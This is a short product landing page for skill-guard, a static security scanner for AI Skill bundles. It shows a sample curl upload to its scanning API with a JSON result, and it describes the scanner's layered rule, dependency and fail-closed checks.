Security scanning for AI Skills.
Catch malicious code, supply-chain attacks, and prompt injection before a Skill ever reaches a user. Pure static analysis — sub-2-second response, zero LLM cost.
Try it in 30 seconds
# Pack a Skill bundle and POST it zip -r my-skill.zip ./my-skill/ curl -X POST https://api.skillguard.vip/v1/scan/upload \ -F "file=@my-skill.zip" # Response { "id": "p7EpuXvQbZOX", "blocked": false, "score": 94, "riskLevel": "Safe", "findings": [], "dependencies": [{ "name": "requests", "source": "python-import" }] }
Threats covered
How it works
L0Structure
File-count and size limits, symlink and binary detection, YAML frontmatter validation, allowed-tools whitelist.
L1Rules
22 hard-block patterns, 50 weighted rules. Context-aware: code vs. mention. Exponential decay scoring across files.
L2Dependencies
Extracts every Python import, Node require, and env-var reference. Cross-checks PyPI / npm / Cargo whitelists.
CIAdapters
Drop-in support for Niuma, OpenClaw, MCP servers, and GPTs Actions. SARIF output for GitHub Security tab.
Fail-closed by design
If rules can't load or a scan times out, skill-guard refuses to ship a passing report. We'd rather a Skill be blocked one second longer than slip through with a fake green check.